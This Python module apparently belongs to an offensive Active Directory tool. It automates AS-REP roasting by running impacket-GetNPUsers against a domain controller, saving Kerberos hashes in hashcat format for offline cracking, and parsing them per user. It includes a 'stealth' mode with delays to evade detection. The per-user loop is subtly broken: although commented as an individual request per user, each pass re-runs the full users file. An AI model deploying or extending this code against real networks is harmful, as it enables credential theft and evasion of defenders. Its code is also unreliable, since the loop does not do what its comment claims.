#!/usr/bin/env python3
import os
import shutil
import subprocess
import logging

from .models import ADUser
from . import stealth as stealth_mod

logger = logging.getLogger(__name__)

IMPACKET_BIN = "impacket-GetNPUsers"
TEMP_HASHFILE = "temp_hashes.txt"


def check_impacket_available() -> bool:
    """Check if impacket-GetNPUsers is available in PATH."""
    if shutil.which(IMPACKET_BIN) is None:
        logger.error(
            f"[-] '{IMPACKET_BIN}' not found in PATH. "
            "Install impacket-scripts or activate the correct environment."
        )
        return False
    return True


def run_getnpusers(
    domain: str,
    dc_ip: str,
    users_file: str,
    output_format: str = "hashcat",
    timeout: int = 30
) -> bool:
    """
    Runs impacket-GetNPUsers against the target domain using the provided
    users file. Results are written to a temporary hash file.

    Returns True if the command executed without a fatal error.
    """
    if not check_impacket_available():
        return False

    if not os.path.exists(users_file):
        logger.error(f"[-] Users file not found: {users_file}")
        return False

    cmd = [
        IMPACKET_BIN,
        f"{domain}/",
        "-dc-ip", dc_ip,
        "-usersfile", users_file,
        "-request",
        "-format", output_format,
        "-outputfile", TEMP_HASHFILE,
    ]

    logger.info(f"[*] Running: {' '.join(cmd)}")

    try:
        result = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=timeout
        )
    except FileNotFoundError:
        logger.error(f"[-] Command not found: {IMPACKET_BIN}")
        return False
    except subprocess.TimeoutExpired:
        logger.error(f"[-] Timed out after {timeout}s while contacting {dc_ip}")
        return False

    if result.returncode != 0:
        logger.warning("[!] impacket-GetNPUsers returned a non-zero exit code")
        if result.stderr:
            logger.warning(f"[!] stderr: {result.stderr.strip()}")

    if result.stdout:
        logger.debug(result.stdout.strip())

    return True


def parse_results(users: list[ADUser]) -> None:
    """
    Parses the temporary hash file produced by impacket-GetNPUsers and
    hydrates the corresponding ADUser objects (roastable flag + hash value).
    Any user not found in the hash file is marked as not roastable.
    """
    roasted_usernames = set()

    if os.path.exists(TEMP_HASHFILE):
        with open(TEMP_HASHFILE, "r", encoding="utf-8") as f:
            lines = [line.strip() for line in f if line.strip()]

        for line in lines:
            if not line.startswith("$krb5asrep$"):
                continue

            try:
                parts = line.split("$")
                # Format: $krb5asrep$23$user@domain:hash...
                user_field = parts[3] if len(parts) > 3 else ""
                extracted_user = user_field.split("@")[0]

                for user in users:
                    if user.username.lower() == extracted_user.lower():
                        user.roastable = True
                        user.hash_value = line
                        roasted_usernames.add(user.username.lower())
                        logger.info(f"[+] Roastable: {user.username}")
                        break
            except (IndexError, ValueError):
                logger.warning(f"[!] Could not parse line: {line}")

        os.remove(TEMP_HASHFILE)
    else:
        logger.warning("[!] No output file was generated by impacket-GetNPUsers")

    for user in users:
        if user.username.lower() not in roasted_usernames:
            user.roastable = False
            logger.info(f"[-] Not roastable: {user.username}")


def process_users(
    users: list[ADUser],
    domain: str,
    dc_ip: str,
    users_file: str,
    output_format: str = "hashcat",
    stealth_level: int = None
) -> None:

    profile = stealth_mod.get_profile(stealth_level) if stealth_level else {}

    if profile:
        stealth_mod.configure_logging(profile)
        logger.info(f"[~] Stealth mode ENABLED — level {stealth_level}")
        users = stealth_mod.prepare_users(users, profile)

    timeout = profile.get("timeout", 30)

    for user in users:
        # Requeete individuelle par user
        success = run_getnpusers(domain, dc_ip, users_file, output_format, timeout=timeout)
        if profile:
            stealth_mod.apply_delay(profile)

    parse_results(users)
    logger.info("[+] Enumeration complete")
